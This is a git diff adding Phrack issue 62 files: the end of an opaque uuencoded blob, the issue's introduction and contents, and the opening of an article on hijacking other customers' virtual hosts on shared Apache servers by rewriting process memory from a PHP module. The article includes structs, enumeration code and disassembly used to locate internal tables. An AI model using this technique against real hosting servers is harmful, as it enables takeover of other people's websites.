+M>VR5:S@SE.B(I$Q2CE);_J_G=?_%XL-M``QXD44QWGA0-98Y`#Y@>C#=C4:C
+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
+$`/@'````
+`
+end
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/1.txt b/phrack62/1.txt
new file mode 100644
index 0000000..5adecb1
--- /dev/null
+++ b/phrack62/1.txt
@@ -0,0 +1,162 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x01 of 0x0f
+
+
+[-]==========================================================================[-]
+
+                      _______ _  _         _  _ _______
+           .__________\                               /__________.
+           |    _ ___ _ ___       _ ___    _ ___    _ ___     _  . _
+       _ __|_____    \/   /__  ____    \____    \____    \_ __/    /
+           b    /    /  _    \/ __/  __/   /    /   /____/   /    /
+           R __/    /   /    /  \    \         /   /    /      __/
+           m \_____/   /    /   /    /   /    /        /   /   \_:__ _
+       - --:-/    /---/____/---/____/---/____/---/____/---/      m
+           |                                              \      m
+           |   %   p H R A C K   i s s u e   # 6 2   %     \_____c__ _
+           |                                                     |
+           `-----------------------------------------------------'
+
+[-]==========================================================================[-]
+
+
+Ladies and gentlemen, blackhatz and whitehat pussies, we are proud to bring
+you the 6th PHRACK release under the new staff....
+
+                          PHRACK #62 IS OUT.
+
+For the second time in the history of phrack do we have a printed HARDCOVER
+version of the magazine. Thanks to the many sponsers we will be giving it
+out free at ruxcon II. This is a limited edition of 500 copies.
+
+The 62 release is Windows centric. The authors did some great work to teach
+you scum how to take Bill's OS apart. Check out this sweet article about
+how to get around windows buffer overflow protections, or the article on
+the kernel mode backdoor.
+
+We like to publish more articles from the electronic/soldering world. This
+issue comes with some details about radio broadcasting, hijacking base
+stations and how to broadcast the propaganda through the neighborhood.
+The carding article teach you how well-known techniques from the computer
+security world still work on smartcards & magnetic stripes (*hint*
+*hint*, replay attack, MiM, ...).
+
+Scut, an old-skewl member of team teso and the father of the 7350-exploits
+has been selected to be prophiled for #62. Richard Thieme, keynote speaker
+at defcon and other hacker conferences submitted two stories. We are
+proud to publish his words under Phrack World News. 
+
+
+ __^__                                                               __^__
+( ___ )-------------------------------------------------------------( ___ )
+ | / | 0x01 Introduction                         phrackstaff 0x08 kb | \ |
+ | / | 0x02 Loopback                             phrackstaff 0x05 kb | \ |
+ | / | 0x03 Linenoise                            phrackstaff 0x21 kb | \ |
+ | / | 0x04 Phrack Prophile on scut              phrackstaff 0x0b kb | \ |
+ | / | 0x05 Bypassing Win BO Protection            Anonymous 0x25 kb | \ |
+ | / | 0x06 Kernel Mode Backdoor for NT           firew0rker 0x81 kb | \ |
+ | / | 0x07 Advances in Windows Shellcode                 sk 0x31 kb | \ |
+ | / | 0x08 Remote Exec                                grugq 0x3b kb | \ |
+ | / | 0x09 UTF8 Shellcode                            greuff 0x32 kb | \ |
+ | / | 0x0a Attacking Apache Modules                    andi 0x5e kb | \ |
+ | / | 0x0b Radio Hacking                           shaun2k2 0x36 kb | \ |
+ | / | 0x0c Win32 Portable Userland Rootkit              kdm 0x48 kb | \ |
+ | / | 0x0d Bypassing Windows Personal FW's           rattle 0x59 kb | \ |
+ | / | 0x0e A DynamicPolyalphabeticSubstitutionCipher  veins 0x42 kb | \ |
+ | / | 0x0f Playing Cards for Smart Profits            ender 0x1a kb | \ |
+ | / | 0x10 Phrack World News                    phrackstaff 0x55 kb | \ |
+ |___|_____________[  PHRACK, NO FEAR & NO DOUBT   ]_________________|___|
+(_____)-------------------------------------------------------------(_____)
+   ^                                                                   ^
+
+Shoutz to:
+  barium        - ascii art
+  gamma         - hardcover
+  johncompanies - that's how server hosting should look like
+  bugbabe       - 31337 grfx
+  david meltze  - tshirt smuggling
+
+
+Enjoy the magazine!
+
+Phrack Magazine Vol 11 Number 62, Build 3, Jul 13, 2004. ISSN 1068-1035
+Contents Copyright (c) 2004 Phrack Magazine.  All Rights Reserved.
+Nothing may be reproduced in whole or in part without the prior written
+permission from the editors.
+Phrack Magazine is made available to the public, as often as possible, free
+of charge.
+
+|=-----------=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=---------=|
+
+Editors           : phrackstaff@phrack.org
+Submissions       : phrackstaff@phrack.org
+Commentary        : loopback@phrack.org
+Phrack World News : pwn@phrack.org
+
+  Note: You must put the word 'ANTISPAM' somewhere in the Subject-line of
+your email. All others will meet their master in /dev/null. We reply to
+every email. Lame emails make it into loopback.
+
+|=-----------------------------------------------------------------------=|
+
+Submissions may be encrypted with the following PGP key:
+(Hint: Always use the PGP key from the latest issue)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.2.1 (GNU/Linux)
+
+mQGiBD8t3OARBACWTusKTxboeSode33ZVBx3AlgMTQ8POA+ssRyJkyVVbrruYlLY
+Bov43vxEsqLZXrfcuCd5iKKk+wLEjESqValODEwaDeeyyPuUMctrr2UrrDlZ2MDT
+f7LvNdyYFDlYzFwSc9sesrNQ78EoWa1kHAGY1bUD2S7ei1aEU9r/EUpFxwCgzLjq
+TV6rC/UzOWntwRk+Ct5u3fUEAJVPIZCQOd2f2M11TOPNaJRxJIxseNQCbRjNReT4
+FG4CsHGqMTEMrgR0C0/Z9H/p4hbjZ2fpPne3oo7YNjnzaDN65UmYJDFUkKiFaQNb
+upTcpQESsCPvN+iaVkas37m1NATKYb8dkKdiM12iTcJ7tNotN5IDjeahNNivFv4K
+5op7A/0VBG8o348MofsE4rN20Qw4I4d6yhZwmJ8Gjfu/OPqonktfNpnEBw13RtLH
+cXEkY5GY+A2AapDCOhqDdh5Fxq9LMLKF2hzZa5JHwp6HcvrYhIyJLW8/uspVGTgP
+ZPx0Z3Cp4rKmzoLcOjyvGbAWUh0WFodK+A4xbr8bEg9PH5qCurQlUGhyYWNrIFN0
+YWZmIDxwaHJhY2tzdGFmZkBwaHJhY2sub3JnPohfBBMRAgAfBQI/LdzgBQkDFwQA
+BAsHAwIDFQIDAxYCAQIeAQIXgAAKCRC8vwVck0UfSeo1AJ42bPrG2L0Nlun1Fthn
+gYlx/9nUiACeJo5tMKlr/JcdKqeEfpNIm4GRmLq5Ag0EPy3dChAIALK9tVpuVImJ
+REXqf4GeR4RkxpAO+8Z2RolTgESW6FfJQcCM8TKeLuGWE2jGKGWKtZ68m+zxgYBK
+z+MOKFvlduktqQpyCJP/Mgdt6yy2aSEq0ZqD1hoqiGmoGdl9L6+VD2kUN6EjWCiv
+5YikjgQaenSUOmZZR0whuezxW9K4XgtLVGkgfqz82yTGwaoU7HynqhJr7UIxdsXx
+dr+y7ad1clR/OgAFg294fmffX6UkBjD5c2MiX/ax16rpDqZii1TJozeeeM7XaIAj
+5lgLLuFZctcWZjItrK6fANVjnNrEusoPnrnis4FdQi4MuYbOATNVKP00iFGlNGQN
+qqvHAsDtDTcABAsH/1zrZyBskztS88voQ2EHRR+bigpIFSlzOtHVDNnryIuF25nM
+yWV10NebrEVid/Um2xpB5qFnZNO1QdgqUTIpkKY+pqJd3mfKGepLhQq+hgSe29HP
+45V6S6ujLQ4dcaHq9PKVdhyA2TjzI/lFAZeCxtig5vtD8t5p/lifFIDDI9MrqAVR
+l1sSwfB8qWcKtMNVQWH6g2zHI1AlG0M42depD50WvdQbKWep/ESh1uP55I9UvhCl
+mQLPI6ASmwlUGq0YZIuEwuI75ExaFeIt2TJjciM5m/zXSZPJQFueB4vsTuhlQICi
+MXt5BXWyqYnDop885WR2jH5HyENOxQRad1v3yF6ITAQYEQIADAUCPy3dCgUJAxcE
+AAAKCRC8vwVck0UfSfL/AJ9ABdnRJsp6rNM4BQPKJ7shevElWACdHGebIKoidGJh
+nntgUSbqNtS5lUo=
+=FnHK
+-----END PGP PUBLIC KEY BLOCK-----
+
+phrack:~# head -22 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/10.txt b/phrack62/10.txt
new file mode 100644
index 0000000..77bdf1f
--- /dev/null
+++ b/phrack62/10.txt
@@ -0,0 +1,1743 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x0a of 0x10
+
+|=-=[ Attacking Apache with builtin Modules in Multihomed Environments ]=|
+|=----------------------------------------------------------------------=|
+|=-----------------------=[ Andi <andi@void.at> ]=----------------------=|
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - Apache Memory Layout: Virtual Hosts
+
+  3 - Get Virtual Hosts from Memory
+
+  4 - Modify a Virtual Host
+
+  5 - A sample attack
+
+  6 - Add a new Virtual Host
+
+  7 - Keep it up
+  
+  8 - Solution
+
+  9 - References
+ 
+  A - Appendix: The implementation
+
+--[ 1 - Introduction
+
+This paper will show a simple way to modify the memory layout from an
+Apache [1] process. Most Webhosting Providers use PHP [2], Mod_perl [3] as
+builtin Apache module to improve the web server performance. This method
+is of course much faster than loading external programs or extensions (i.e.
+running php in cgi mode). But on the other side this script runs in the
+same memory space as the apache process so you can easily change
+contents of memory. 
+
+There's one reason why all this stuff will work as good as it should.
+Apache holds 5 children in memory (per default). After a HTTP request the
+process will not be killed. Instead of exiting the current apache process
+after closing the connection the next request will be processed by the
+same process. So when you send a lot of requests to the apache server you
+can "infect" every process.
+
+We use this attack technique to hijack a virtual host on server. I know,
+there are other methods to get control over the HTTP requests (using open
+file descriptors,...). But all other methods require at least one process
+running on the server that handles the HTTP requests and redirect them.
+This way of hijacking apache doesn't require another process because we 
+change the memory of the apache process itself and so it works normal as 
+before.
+ 
+This attack technique requires access to an account on a webserver which 
+hosts at least two sites (else it wouldnt make any sense). You can't
+exploit Apache without your own php script on that server (well perhaps
+there are some "Remote Include" vulnerabilities so you can run a script on
+the remote machine).
+
+--[ 2 - Apache Memory Layout: Virtual Hosts
+
+So when Apache recieves a HTTP request an object from type request_rec 
+will be created. This object contains information about the HTTP request
+like the method which is used (GET, POST..), the HTTP protocol number etc.
+Now the correct list for the server ip will be looked up in the IP address
+hash table (iphash_table). The pointer from that list will be stored in
+the request object (variable vhost_lookup_data). After the headers from
+the HTTP request have been read Apache updates it's vhost status. It will
+use the vhost_lookup_data pointer to find the correct virtual host.
+
+Apache uses internal lists for it's virtual hosts. To speed up search 
+requests there is more than one list and a hash table for IP address
+lookups. The information about every virtual host is stored in an object
+from type server_rec.
+
+[apache_1.3.29/src/include/httpd.h]
+...
+struct server_rec {
+
+    server_rec *next;
+
+    ...
+
+    /* Contact information */
+
+    char *server_admin;
+    char *server_hostname;
+    unsigned short port;        /* for redirects, etc. */
+
+    ...
+
+    char *path;                 /* Pathname for ServerPath */
+    int pathlen;                /* Length of path */
+
+    array_header *names;        /* Normal names for ServerAlias servers */
+    array_header *wild_names;/* Wildcarded names for ServerAlias servers */
+
+    uid_t server_uid; /* effective user id when calling exec wrapper */
+    gid_t server_gid; /* effective group id when calling exec wrapper */
+};
+
+As you can see there are many interesting values we would like to change.
+Imagine you are running a virtual host on the same web server as
+http://www.evil.com. So you simply have to look for that virtual host and
+change the variables.
+
+So we know where Apache stores the virtual host information. Now we have to
+find the list and structures that points to those server_rec objects. Lets
+have a look where Apache initializes its virtual hosts.
+
+[apache_1.3.29/src/main/http_vhost.c]
+...
+/* called at the beginning of the config */
+API_EXPORT(void) ap_init_vhost_config(pool *p)
+{
+    memset(iphash_table, 0, sizeof(iphash_table));
+    default_list = NULL;
+    name_vhost_list = NULL;
+    name_vhost_list_tail = &name_vhost_list;
+}
+...
+
+As you can see there are two lists and one hash table. The hash table is
+used for IP address lookups. The default_list contains _default_ server
+entries and name_vhost_list contains all other virtual hosts. The objects
+from the hash table have the following structure:
+
+struct ipaddr_chain {
+    ipaddr_chain *next;
+    server_addr_rec *sar;    /* the record causing it to be in
+                              * this chain (need for both ip addr and port
+                              * comparisons) */
+    server_rec *server;      /* the server to use if this matches */
+    name_chain *names;       /* if non-NULL then a list of name-vhosts
+                              * sharing this address */
+};
+
+Then you have a list of virtual hosts names poiting to that IP address
+(name_chain *names). And from that structure we can directly access the
+virtual host data:
+
+struct name_chain {
+    name_chain *next;
+    server_addr_rec *sar;    /* the record causing it to be in
+                              * this chain (needed for port comparisons) */
+    server_rec *server;         /* the server to use on a match */
+};
+
+
+So the following code will find the correct vhost (variable host):
+...
+    for (i = 0; i < IPHASH_TABLE_SIZE; i++) {
+       for (trav = iphash_table[i]; trav; trav = trav->next) {
+           for (n = trav->names; n != NULL; n = n->next) {
+               conf = ap_get_module_config(n->server->module_config, 
+                                          &core_module);
+               if ( (host != NULL && 
+                    !strcmp(host, n->server->server_hostname)) ||
+                           host == NULL ){
+                              php_printf("VirtualHost: [%s, %s, %s, %s]<br>\n",
+                              n->sar->virthost,
+                              n->server->server_admin,
+                              n->server->server_hostname,
+                              conf->ap_document_root);
+               }
+           }
+       }
+    }
+...
+
+--[ 3 - Get Virtual Hosts from Memory
+
+If we want to change the characteristics of virtual hosts we have to know where
+Apache stores the lists in memory. Apache initialize this list before
+reading the config file. This is done in the ap_init_vhost_config()
+function.
+
+[apache_1.3.29/src/main/http_vhost.c]
+...
+/* called at the beginning of the config */
+API_EXPORT(void) ap_init_vhost_config(pool *p)
+{
+    memset(iphash_table, 0, sizeof(iphash_table)); <----  Yes, thats great
+    default_list = NULL;
+    name_vhost_list = NULL;
+    name_vhost_list_tail = &name_vhost_list; 
+}
+...
+
+So there are many ways to get the address of iphash_table. You can use
+gdb, nm (when not stripped),..
+
+andi@blackbull:~$ gdb /usr/sbin/apache
+GNU gdb 2002-04-01-cvs
+Copyright 2002 Free Software Foundation, Inc.
+GDB is free software, covered by the GNU General Public License, and you
+are welcome to change it and/or distribute copies of it under certain
+conditions.
+Type "show copying" to see the conditions.
+There is absolutely no warranty for GDB.  Type "show warranty" for details.
+This GDB was configured as "i386-linux"...(no debugging symbols found)...
+(gdb) disass ap_init_vhost_config
+Dump of assembler code for function ap_init_vhost_config:
+0x080830e0 <ap_init_vhost_config+0>:    push   %ebp
+0x080830e1 <ap_init_vhost_config+1>:    mov    %esp,%ebp
+0x080830e3 <ap_init_vhost_config+3>:    sub    $0x8,%esp
+0x080830e6 <ap_init_vhost_config+6>:    add    $0xfffffffc,%esp
+0x080830e9 <ap_init_vhost_config+9>:    push   $0x400
+0x080830ee <ap_init_vhost_config+14>:   push   $0x0
+0x080830f0 <ap_init_vhost_config+16>:   push   $0x80ceec0
+                                               ^^^^^^^^^^
+					       address of iphash_table
+0x080830f5 <ap_init_vhost_config+21>:   call   0x804f858 <memset>
+0x080830fa <ap_init_vhost_config+26>:   add    $0x10,%esp
+0x080830fd <ap_init_vhost_config+29>:   movl   $0x0,0x80cf2c0
+0x08083107 <ap_init_vhost_config+39>:   movl   $0x0,0x80cf2c4
+0x08083111 <ap_init_vhost_config+49>:   movl   $0x80cf2c4,0x80cf2c8
+0x0808311b <ap_init_vhost_config+59>:   leave
+0x0808311c <ap_init_vhost_config+60>:   ret
+0x0808311d <ap_init_vhost_config+61>:   lea    0x0(%esi),%esi
+End of assembler dump.
+
+If you dont have access to the apache binary you have to use another
+method: In hoagie_apachephp.c there are some external defintions of apache
+functions.
+
+...
+/* some external defintions to get address locations from memory */
+extern API_EXPORT(void) ap_init_vhost_config(pool *p);
+extern API_VAR_EXPORT module core_module;
+...
+
+So inside our module we already have the address for this functions and
+can use the integrated disassembler to get the addresses.
+
+iphash_table =
+   (ipaddr_chain **)getcall((char*)ap_init_vhost_config, "push", 3);
+
+default_list = 
+   (ipaddr_chain *)getcall((char*)ap_init_vhost_config, "mov", 1);
+
+And now its very easy to change any vhost data.
